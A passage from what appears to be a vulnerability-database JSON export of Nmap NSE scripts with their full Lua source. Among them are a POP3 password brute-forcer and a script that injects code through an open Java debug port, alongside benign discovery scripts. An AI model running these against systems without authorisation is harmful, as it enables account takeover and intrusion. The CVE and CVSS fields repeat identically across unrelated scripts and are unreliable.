-- Max response time: 10 Seconds, for version 2 and 3\n 0, -- Checksum, calculated later\n 0 -- Multicast Address: 0.0.0.0\n )\n\n if version == 3 then\n igmp_raw = igmp_raw .. string.pack(\">BB I2\",\n 0, -- Reserved = 4 bits (Should be zeroed)\n -- Supress Flag = 1 bit\n -- QRV (Querier's Robustness Variable) = 3 bits\n -- all are set to 0\n 0x10, -- QQIC (Querier's Query Interval Code) in seconds = Set to 0 to get insta replies.\n 0x0001 -- Number of sources (in the next arrays) = 1 ( Our IP only)\n )\n .. ipOps.ip_to_str(interface.address) -- Source = Our IP address\n end\n\n igmp_raw = igmp_raw:sub(1,2) .. string.pack(\">I2\", packet.in_cksum(igmp_raw)) .. igmp_raw:sub(5)\n\n return igmp_raw\nend\n\n\nlocal igmpQuery;\n--- Sends an IGMP Membership query.\n-- @param interface Network interface to send on.\n-- @param version IGMP version. Could be 1, 2, 3 or all.\nigmpQuery = function(interface, version)\n local srcip = interface.address\n local dstip = \"224.0.0.1\"\n\n if version == 'all' then\n -- Small pause to let listener begin and not miss reports.\n stdnse.sleep(0.5)\n igmpQuery(interface, 3)\n igmpQuery(interface, 2)\n igmpQuery(interface, 1)\n else\n local igmp_raw = igmpRaw(interface, version)\n\n local ip_raw = stdnse.fromhex( \"45c00040ed780000010218bc0a00c8750a00c86b\") .. igmp_raw\n local igmp_packet = packet.Packet:new(ip_raw, ip_raw:len())\n igmp_packet:ip_set_bin_src(ipOps.ip_to_str(srcip))\n igmp_packet:ip_set_bin_dst(ipOps.ip_to_str(dstip))\n igmp_packet:ip_set_len(#igmp_packet.buf)\n igmp_packet:ip_count_checksum()\n\n local sock = nmap.new_dnet()\n sock:ethernet_open(interface.device)\n\n -- Ethernet IPv4 multicast, our ethernet address and type IP\n local eth_hdr = \"\\x01\\x00\\x5e\\x00\\x00\\x01\" .. interface.mac .. \"\\x08\\x00\"\n sock:ethernet_send(eth_hdr .. igmp_packet.buf)\n sock:ethernet_close()\n end\nend\n\n-- Function to compare weight of an IGMP response message.\n-- Used to sort elements in responses table.\nlocal respCompare = function(a,b)\n return ipOps.todword(a.src) + a.type + (a.ngroups or ipOps.todword(a.group))\n < ipOps.todword(b.src) + b.type + (b.ngroups or ipOps.todword(b.group))\nend\n\nlocal mgroup_names_fetch = function(filename)\n local groupnames_db = {}\n\n local file = io.open(filename, \"r\")\n if not file then\n return false\n end\n\n for l in file:lines() do\n groupnames_db[#groupnames_db + 1] = stringaux.strsplit(\"\\t\", l)\n end\n\n file:close()\n return groupnames_db\nend\n\nlocal mgroup_name_identify = function(db, ip)\n --stdnse.debug1(\"'%s'\", ip)\n for _, mg in ipairs(db) do\n local ip1 = mg[1]\n local ip2 = mg[2]\n local desc = mg[3]\n --stdnse.debug1(\"try: %s <= %s <= %s (%s)\", ip1, ip, ip2, desc)\n if (not ipOps.compare_ip(ip, \"lt\", ip1) and not ipOps.compare_ip(ip2, \"lt\", ip)) then\n --stdnse.debug1(\"found! %s <= %s <= %s (%s)\", ip1, ip, ip2, desc)\n return desc\n end\n end\n return false\nend\n\naction = function(host, port)\n local timeout = stdnse.parse_timespec(stdnse.get_script_args(SCRIPT_NAME .. \".timeout\"))\n local version = stdnse.get_script_args(SCRIPT_NAME .. \".version\") or 2\n local interface = stdnse.get_script_args(SCRIPT_NAME .. \".interface\")\n timeout = (timeout or 7) * 1000\n if version ~= 'all' then\n version = tonumber(version)\n end\n\n local responses, results, interfaces, lthreads = {}, {}, {}, {}\n local result, grouptable, sourcetable\n\n local group_names_fname = stdnse.get_script_args(SCRIPT_NAME .. \".mgroupnamesdb\") or\n nmap.fetchfile(\"nselib/data/mgroupnames.db\")\n local mg_names_db = group_names_fname and mgroup_names_fetch(group_names_fname)\n\n -- Check the interface\n interface = interface or nmap.get_interface()\n if interface then\n -- Get the interface information\n interface = nmap.get_interface_info(interface)\n if not interface then\n return stdnse.format_output(false, (\"Failed to retrieve %s interface information.\"):format(interface))\n end\n interfaces = {interface}\n stdnse.debug1(\"Will use %s interface.\", interface.shortname)\n else\n local ifacelist = nmap.list_interfaces()\n for _, iface in ipairs(ifacelist) do\n -- Match all ethernet interfaces\n if iface.address and iface.link==\"ethernet\" and\n iface.address:match(\"%d+%.%d+%.%d+%.%d+\") then\n\n stdnse.debug1(\"Will use %s interface.\", iface.shortname)\n table.insert(interfaces, iface)\n end\n end\n end\n\n\n -- We should iterate over interfaces\n for _, interface in pairs(interfaces) do\n local co = stdnse.new_thread(igmpListener, interface, timeout, responses)\n igmpQuery(interface, version)\n lthreads[co] = true\n end\n\n local condvar = nmap.condvar(responses)\n -- Wait for the listening threads to finish\n repeat\n for thread in pairs(lthreads) do\n if coroutine.status(thread) == \"dead\" then lthreads[thread] = nil end\n end\n if ( next(lthreads) ) then\n condvar(\"wait\")\n end\n until next(lthreads) == nil;\n\n -- Output useful info from the responses\n if #responses > 0 then\n -- We should sort our list here.\n -- This is useful to have consistent results for tools such as Ndiff.\n table.sort(responses, respCompare)\n\n for _, response in pairs(responses) do\n result = {}\n result.name = response.src\n table.insert(result, \"Interface: \" .. response.interface)\n -- Add to new targets if newtargets script arg provided\n if target.ALLOW_NEW_TARGETS then target.add(response.src) end\n if response.type == 0x12 then\n table.insert(result, \"Version: 1\")\n table.insert(result, \"Multicast group: \".. response.group)\n elseif response.type == 0x16 then\n table.insert(result, \"Version: 2\")\n table.insert(result, \"Group: \".. response.group)\n local mg_desc = mgroup_name_identify(mg_names_db, response.group)\n if mg_desc then\n table.insert(result, \"Description: \".. mg_desc)\n end\n elseif response.type == 0x22 then\n table.insert(result, \"Version: 3\")\n for _, group in pairs(response.groups) do\n grouptable = {}\n grouptable.name = \"Group: \" .. group.address\n if group.mode == 0x01 then\n table.insert(grouptable, \"Mode: INCLUDE\")\n elseif group.mode == 0x02 then\n table.insert(grouptable, \"Mode: EXCLUDE\")\n end\n local mg_desc = mgroup_name_identify(mg_names_db, group.address)\n if mg_desc then\n table.insert(grouptable, \"Description: \".. mg_desc)\n end\n if group.nsrc > 0 then\n sourcetable = {}\n sourcetable.name = \"Sources:\"\n table.insert(sourcetable, group.src)\n table.insert(grouptable, sourcetable)\n end\n table.insert(result, grouptable)\n end\n end\n table.insert(results, result)\n end\n if #results>0 and not target.ALLOW_NEW_TARGETS then\n table.insert(results,\"Use the newtargets script-arg to add the results as targets\")\n end\n return stdnse.format_output(true, results)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:38:28", "description": "Tries to log into a POP3 account by guessing usernames and passwords.\n\n## Script Arguments \n\n#### pop3loginmethod \n\nThe login method to use: `\"USER\"` (default), `\"SASL-PLAIN\"`, `\"SASL-LOGIN\"`, `\"SASL-CRAM-MD5\"`, or `\"APOP\"`. Defaults to `\"USER\"`,\n\n#### passdb, unpwdb.passlimit, unpwdb.timelimit, unpwdb.userlimit, userdb \n\nSee the documentation for the [unpwdb](<../lib/unpwdb.html#script-args>) library. \n\n#### creds.[service], creds.global \n\nSee the documentation for the [creds](<../lib/creds.html#script-args>) library. \n\n#### brute.credfile, brute.delay, brute.emptypass, brute.firstonly, brute.guesses, brute.mode, brute.passonly, brute.retries, brute.start, brute.threads, brute.unique, brute.useraspass \n\nSee the documentation for the [brute](<../lib/brute.html#script-args>) library. \n\n## Example Usage \n \n \n nmap -sV --script=pop3-brute <target>\n\n## Script Output \n \n \n PORT STATE SERVICE\n 110/tcp open pop3\n | pop3-brute-ported:\n | Accounts:\n | user:pass => Login correct\n | Statistics:\n |_ Performed 8 scans in 1 seconds, average tps: 8\n\n## Requires \n\n * [brute](<../lib/brute.html>)\n * [comm](<../lib/comm.html>)\n * [creds](<../lib/creds.html>)\n * [nmap](<../lib/nmap.html>)\n * [pop3](<../lib/pop3.html>)\n * [shortport](<../lib/shortport.html>)\n * [string](<>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2008-11-06T02:52:59", "type": "nmap", "title": "pop3-brute NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2020-10-19T17:13:22", "id": "NMAP:POP3-BRUTE.NSE", "href": "https://nmap.org/nsedoc/scripts/pop3-brute.html", "sourceData": "local brute = require \"brute\"\nlocal comm = require \"comm\"\nlocal creds = require \"creds\"\nlocal nmap = require \"nmap\"\nlocal pop3 = require \"pop3\"\nlocal shortport = require \"shortport\"\nlocal string = require \"string\"\n\ndescription = [[\nTries to log into a POP3 account by guessing usernames and passwords.\n]]\n\n---\n-- @args pop3loginmethod The login method to use: <code>\"USER\"</code>\n-- (default), <code>\"SASL-PLAIN\"</code>, <code>\"SASL-LOGIN\"</code>,\n-- <code>\"SASL-CRAM-MD5\"</code>, or <code>\"APOP\"</code>. Defaults to <code>\"USER\"</code>,\n--\n-- @output\n-- PORT STATE SERVICE\n-- 110/tcp open pop3\n-- | pop3-brute-ported:\n-- | Accounts:\n-- | user:pass => Login correct\n-- | Statistics:\n-- |_ Performed 8 scans in 1 seconds, average tps: 8\n\nauthor = {\"Philip Pickering\", \"Piotr Olma\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"intrusive\", \"brute\"}\n\nDriver = {\n new = function(self, host, port, login_function, is_apop)\n local o = {}\n setmetatable(o, self)\n self.__index = self\n o.port = port\n o.host = host\n o.login_function = login_function\n o.is_apop = is_apop\n return o\n end,\n\n -- Attempts to connect to the POP server\n -- @return true on success\n -- @return false, brute.Error object on failure\n connect = function(self)\n\n self.socket = brute.new_socket()\n local opts = {timeout=10000, recv_before=true}\n local best_opt, line, _\n self.socket, _, best_opt, line = comm.tryssl(self.host, self.port, \"\" , opts)\n\n if not self.socket then\n local err = brute.Error:new(\"Failed to connect.\")\n err:setAbort(true)\n return false, err\n end --no connection\n if not pop3.stat(line) then\n local err = brute.Error:new(\"Failed to make a pop-connection.\")\n err:setAbort(true)\n return false, err\n end -- no pop-connection\n\n if self.is_apop then\n self.additional = string.match(line, \"<[%p%w]+>\") --apop challenge\n end\n return true\n end, --connect\n\n -- Attempts to login to the POP server\n --\n -- @param username string containing the login username\n -- @param password string containing the login password\n -- @return status, true on success, false on failure\n -- @return brute.Error object on failure\n -- creds.Account object on success\n login = function(self, username, password)\n local pstatus\n local perror\n pstatus, perror = self.login_function(self.socket, username, password, self.additional)\n if pstatus then\n return true, creds.Account:new(username, password, creds.State.VALID)\n else\n local err\n if (perror == pop3.err.pwError) then\n err = brute.Error:new(\"Wrong password.\")\n elseif (perror == pop3.err.userError) then\n err = brute.Error:new(\"Wrong username.\")\n err:setInvalidAccount(username)\n else\n err = brute.Error:new(\"Login failed.\")\n end\n return false, err\n end\n end, --login\n\n disconnect = function(self)\n self.socket:close()\n end, --disconnect\n\n check = function(self)\n return true\n end, --check\n}\n\nportrule = shortport.port_or_service({110, 995}, {\"pop3\",\"pop3s\"})\n\naction = function(host, port)\n local pMeth = nmap.registry.args.pop3loginmethod\n if (not pMeth) then pMeth = nmap.registry.pop3loginmethod end\n if (not pMeth) then pMeth = \"USER\" end\n\n --determine function we will use to login to server\n local is_apop = false\n local login_function\n if (pMeth == \"USER\") then\n login_function = pop3.login_user\n elseif (pMeth == \"SASL-PLAIN\") then\n login_function = pop3.login_sasl_plain\n elseif (pMeth == \"SASL-LOGIN\") then\n login_function = pop3.login_sasl_login\n elseif (pMeth == \"SASL-CRAM-MD5\") then\n login_function = pop3.login_sasl_crammd5\n elseif (pMeth == \"APOP\") then\n login_function = pop3.login_apop\n is_apop = true\n else\n login_function = pop3.login_user\n end\n\n local engine = brute.Engine:new(Driver, host, port, login_function, is_apop)\n engine.options.script_name = SCRIPT_NAME\n local status, accounts = engine:start()\n return accounts\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:41:17", "description": "Attempts to exploit java's remote debugging port. When remote debugging port is left open, it is possible to inject java bytecode and achieve remote code execution. This script injects and execute a Java class file that returns remote system information.\n\n## Example Usage \n \n \n nmap -sT <target> -p <port> --script=+jdwp-info\n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 2010/tcp open search syn-ack\n | jdwp-info:\n | Available processors: 1\n | Free memory: 15331736\n | File system root: A:\\\n | Total space (bytes): 0\n | Free space (bytes): 0\n | File system root: C:\\\n | Total space (bytes): 42935926784\n | Free space (bytes): 29779054592\n | File system root: D:\\\n | Total space (bytes): 0\n | Free space (bytes): 0\n | Name of the OS: Windows XP\n | OS Version : 5.1\n | OS patch level : Service Pack 3\n | OS Architecture: x86\n | Java version: 1.7.0_01\n | Username: user\n | User home: C:\\Documents and Settings\\user\n |_ System time: Sat Aug 11 15:21:44 CEST 2012\n\n## Requires \n\n * [io](<>)\n * [jdwp](<../lib/jdwp.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [string](<>)\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2012-08-14T11:31:08", "type": "nmap", "title": "jdwp-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-08-29T03:06:40", "id": "NMAP:JDWP-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/jdwp-info.html", "sourceData": "local io = require \"io\"\nlocal jdwp = require \"jdwp\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\n\ndescription = [[\nAttempts to exploit java's remote debugging port. When remote\ndebugging port is left open, it is possible to inject java bytecode\nand achieve remote code execution. This script injects and execute a\nJava class file that returns remote system information.\n]]\n\nauthor = \"Aleksandar Nikolic\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"default\",\"safe\",\"discovery\"}\n\n---\n-- @usage nmap -sT <target> -p <port> --script=+jdwp-info\n-- @output\n-- PORT STATE SERVICE REASON\n-- 2010/tcp open search syn-ack\n-- | jdwp-info:\n-- | Available processors: 1\n-- | Free memory: 15331736\n-- | File system root: A:\\\n-- | Total space (bytes): 0\n-- | Free space (bytes): 0\n-- | File system root: C:\\\n-- | Total space (bytes): 42935926784\n-- | Free space (bytes): 29779054592\n-- | File system root: D:\\\n-- | Total space (bytes): 0\n-- | Free space (bytes): 0\n-- | Name of the OS: Windows XP\n-- | OS Version : 5.1\n-- | OS patch level : Service Pack 3\n-- | OS Architecture: x86\n-- | Java version: 1.7.0_01\n-- | Username: user\n-- | User home: C:\\Documents and Settings\\user\n-- |_ System time: Sat Aug 11 15:21:44 CEST 2012\n\nportrule = function(host, port)\n -- JDWP will close the port if there is no valid handshake within 2\n -- seconds, Service detection's NULL probe detects it as tcpwrapped.\n return port.service == \"tcpwrapped\"\n and port.protocol == \"tcp\" and port.state == \"open\"\n and not(shortport.port_is_excluded(port.number,port.protocol))\nend\n\naction = function(host, port)\n stdnse.sleep(5) -- let the remote socket recover from connect() scan\n local status,socket = jdwp.connect(host,port) -- initialize the connection\n if not status then\n stdnse.debug1(\"error, %s\",socket)\n return nil\n end\n\n -- read .class file\n local file = io.open(nmap.fetchfile(\"nselib/data/jdwp-class/JDWPSystemInfo.class\"), \"rb\")\n local class_bytes = file:read(\"a\")\n\n -- inject the class\n local injectedClass\n status,injectedClass = jdwp.injectClass(socket,class_bytes)\n if not status then\n stdnse.debug1(\"Failed to inject class\")\n return stdnse.format_output(false, \"Failed to inject class\")\n end\n -- find injected class method\n local runMethodID = jdwp.findMethod(socket,injectedClass.id,\"run\",false)\n\n if runMethodID == nil then\n stdnse.debug1(\"Couldn't find run method\")\n return stdnse.format_output(false, \"Couldn't find run method.\")\n end\n\n -- invoke run method\n local result\n status, result = jdwp.invokeObjectMethod(socket,0,injectedClass.instance,injectedClass.thread,injectedClass.id,runMethodID,0,nil)\n if not status then\n stdnse.debug1(\"Couldn't invoke run method\")\n return stdnse.format_output(false, result)\n end\n -- get the result string\n local stringID = string.unpack(\">x I8\",result)\n status,result = jdwp.readString(socket,0,stringID)\n -- parse results\n return stdnse.format_output(status,result)\nend\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:32:34", "description": "Retrieves some basic information, including protocol version from a Vuze filesharing node. \n\nAs Vuze doesn't have a default port for its DHT service, this script has some difficulties in determining when to run. Most scripts are triggered by either a default port or a fingerprinted service. To get around this, there are two options: 1\\. Always run a version scan, to identify the vuze-dht service in order to trigger the script. 2\\. Force the script to run against each port by setting the argument vuze-dht-info.allports\n\n## Script Arguments \n\n#### vuze-dht-info.allports \n\nif set runs this script against every open port\n\n## Example Usage \n \n \n nmap -sU -p <port> <ip> --script vuze-dht-info -sV\n \n\n## Script Output \n \n \n PORT STATE SERVICE VERSION\n 17555/udp open vuze-dht Vuze\n | vuze-dht-info:\n | Transaction id: 9438865\n | Connection id: 0xFF79A77B4592BDB0\n | Protocol version: 50\n | Vendor id: Azureus (0)\n | Network id: Stable (0)\n |_ Instance id: 2260473691\n \n\n## Requires \n\n * [nmap](<../lib/nmap.html>)\n * [shortport](<../lib/shortport.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [vuzedht](<../lib/vuzedht.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2011-12-03T09:18:58", "type": "nmap", "title": "vuze-dht-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2018-09-11T04:37:48", "id": "NMAP:VUZE-DHT-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/vuze-dht-info.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\n\nlocal vuzedht = stdnse.silent_require \"vuzedht\"\n\ndescription = [[\nRetrieves some basic information, including protocol version from a Vuze filesharing node.\n\nAs Vuze doesn't have a default port for its DHT service, this script has\nsome difficulties in determining when to run. Most scripts are triggered by\neither a default port or a fingerprinted service. To get around this, there\nare two options:\n1. Always run a version scan, to identify the vuze-dht service in order to\n trigger the script.\n2. Force the script to run against each port by setting the argument\n vuze-dht-info.allports\n]]\n\n---\n-- @usage\n-- nmap -sU -p <port> <ip> --script vuze-dht-info -sV\n--\n-- @output\n-- PORT STATE SERVICE VERSION\n-- 17555/udp open vuze-dht Vuze\n-- | vuze-dht-info:\n-- | Transaction id: 9438865\n-- | Connection id: 0xFF79A77B4592BDB0\n-- | Protocol version: 50\n-- | Vendor id: Azureus (0)\n-- | Network id: Stable (0)\n-- |_ Instance id: 2260473691\n--\n-- @args vuze-dht-info.allports if set runs this script against every open port\n\nauthor = \"Patrik Karlsson\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"discovery\", \"safe\"}\n\n\nportrule = function(host, port)\n local allports = stdnse.get_script_args('vuze-dht-info.allports')\n if ( tonumber(allports) == 1 or allports == 'true' ) then\n return true\n else\n local f = shortport.port_or_service({17555, 49160, 49161, 49162}, \"vuze-dht\", \"udp\", {\"open\", \"open|filtered\"})\n return f(host, port)\n end\nend\n\nlocal function getDHTInfo(host, port, lhost)\n\n local helper = vuzedht.Helper:new(host, port, lhost)\n local status = helper:connect()\n\n if ( not(status) ) then\n return false, \"Failed to connect to server\"\n end\n\n local response\n status, response = helper:ping()\n if ( not(status) ) then\n return false, \"Failed to ping vuze node\"\n end\n helper:close()\n\n return true, response\nend\n\naction = function(host, port)\n\n local status, response = getDHTInfo(host, port)\n if not status then\n return stdnse.format_output(false, response)\n end\n\n -- check whether we have an error due to an incorrect address\n -- ie. we're on a NAT:ed network and we're announcing our private ip\n if ( status and response.header.action == vuzedht.Response.Actions.ERROR ) then\n status, response = getDHTInfo(host, port, response.addr.ip)\n end\n\n if ( status ) then\n nmap.set_port_state(host, port, \"open\")\n return tostring(response)\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T21:43:38", "description": "Attempts to extract information from HP iLO boards including versions and addresses. \n\nHP iLO boards have an unauthenticated info disclosure at <ip>/xmldata?item=all. It lists board informations such as server model, firmware version, MAC addresses, IP addresses, etc. This script uses the slaxml library to parse the iLO xml file and display the info.\n\n## Script Arguments \n\n#### slaxml.debug \n\nSee the documentation for the [slaxml](<../lib/slaxml.html#script-args>) library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the [http](<../lib/http.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the [smbauth](<../lib/smbauth.html#script-args>) library. \n\n## Example Usage \n\n * nmap --script hp-ilo-info -p 80 <target>\n \n\n * nmap --script hp-ilo-info -sV <target>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 80/tcp open http\n | ilo-info:\n | ServerType: ProLiant MicroServer Gen8\n | ProductID: XXXXXX-XXX\n | UUID: XXXXXXXXXXXXXXXX\n | cUUID: XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXX\n | ILOType: Integrated Lights-Out 4 (iLO 4)\n | ILOFirmware: X.XX\n | SerialNo: ILOXXXXXXXXXX\n | NICs:\n | NIC 1:\n | Description: iLO 4\n | MacAddress: 12:34:56:78:9a:bc\n | IPAddress: 10.10.10.10\n | Status: OK\n | NIC 2:\n | Description: iLo 4\n | MacAddress: 11:22:33:44:55:66\n | IPAddress: Unknown\n |_ Status: Disabled\n \n\n## Requires \n\n * [http](<../lib/http.html>)\n * [slaxml](<../lib/slaxml.html>)\n * [stdnse](<../lib/stdnse.html>)\n * [shortport](<../lib/shortport.html>)\n\n* * *\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-04-08T15:35:36", "type": "nmap", "title": "http-hp-ilo-info NSE Script", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2012-1182", "CVE-2017-7494"], "modified": "2019-04-13T21:42:56", "id": "NMAP:HTTP-HP-ILO-INFO.NSE", "href": "https://nmap.org/nsedoc/scripts/http-hp-ilo-info.html", "sourceData": "description = [[\nAttempts to extract information from HP iLO boards including versions and addresses.\n\nHP iLO boards have an unauthenticated info disclosure at <ip>/xmldata?item=all.\nIt lists board informations such as server model, firmware version,\nMAC addresses, IP addresses, etc. This script uses the slaxml library\nto parse the iLO xml file and display the info.\n]]\n\n---\n--@usage nmap --script hp-ilo-info -p 80 <target>\n--\n--@usage nmap --script hp-ilo-info -sV <target>\n--\n--@output\n--PORT STATE SERVICE\n--80/tcp open http\n--| ilo-info:\n--| ServerType: ProLiant MicroServer Gen8\n--| ProductID: XXXXXX-XXX\n--| UUID: XXXXXXXXXXXXXXXX\n--| cUUID: XXXXXXXX-XXXX-XXXX-XXXX-XXXXXXXXXX\n--| ILOType: Integrated Lights-Out 4 (iLO 4)\n--| ILOFirmware: X.XX\n--| SerialNo: ILOXXXXXXXXXX\n--| NICs:\n--| NIC 1:\n--| Description: iLO 4\n--| MacAddress: 12:34:56:78:9a:bc\n--| IPAddress: 10.10.10.10\n--| Status: OK\n--| NIC 2:\n--| Description: iLo 4\n--| MacAddress: 11:22:33:44:55:66\n--| IPAddress: Unknown\n--|_ Status: Disabled\n--\n\nauthor = \"Rajeev R Menon\"\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"safe\",\"discovery\"}\n\nlocal http = require \"http\"\nlocal slaxml = require \"slaxml\"\nlocal stdnse = require \"stdnse\"\nlocal shortport = require \"shortport\"\n\nportrule = shortport.http\n\nfunction getTag(table,tag)\n for _,n in ipairs(table.kids) do\n if n.type == \"element\" and n.name == tag then\n return n\n elseif n.type == \"element\" then\n local ret = getTag(n,tag)\n if ret ~= nil then return ret end\n end\n end\n return nil\nend\n\nfunction parseXML(dom)\n local response = stdnse.output_table()\n local info = stdnse.output_table()\n info['ServerType'] = getTag(dom,\"SPN\")\n info['ProductID'] = getTag(dom,\"PRODUCTID\")\n info['UUID'] = getTag(dom,\"UUID\")\n info['cUUID'] = getTag(dom,\"cUUID\")\n info['ILOType'] = getTag(dom,\"PN\")\n info['ILOFirmware'] = getTag(dom,\"FWRI\")\n info['SerialNo'] = getTag(dom,\"SN\")\n\n for key,_ in pairs(info) do\n if info[key] ~= nil then\n response[tostring(key)] = info[key].kids[1].value\n end\n end\n\n response.NICs = stdnse.output_table()\n local nicdom = getTag(dom,\"NICS\")\n if nicdom ~= nil then\n local count = 1\n for _,n in ipairs(nicdom.kids) do\n local nic = stdnse.output_table()\n info = stdnse.output_table()\n for k,m in ipairs(n.kids) do\n if #m.kids >= 1 and m.kids[1].type == \"text\" then\n if m.name == \"DESCRIPTION\" then\n info[\"Description\"] = m.kids[1].value\n elseif m.name == \"MACADDR\" then\n info[\"MacAddress\"] = m.kids[1].value\n elseif m.name == \"IPADDR\" then\n info[\"IPAddress\"] = m.kids[1].value\n elseif m.name == \"STATUS\" then\n info[\"Status\"] = m.kids[1].value\n end\n end\n end\n for key,_ in pairs(info) do\n nic[tostring(key)] = info[key]\n end\n response.NICs[\"NIC \"..tostring(count)] = nic\n count = count + 1\n end\n end\n return response\nend\n\naction = function(host,port)\n local response = http.get(host,port,\"/xmldata?item=all\")\n if response[\"status\"] ~= 200\n or not response.body\n or not response.body:match('<RIMP>')\n or not response.body:match('iLO')\n then\n return\n end\n local domtable = slaxml.parseDOM(response[\"body\"],{stripWhitespace=true})\n return parseXML(domtable)\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-15T09:34:52", "description": "Attempts to obtain the current system date and the start date of a SMB2 server.\n\n## Script Arguments \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the [smb](<../lib/smb.html#script-args>) library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, 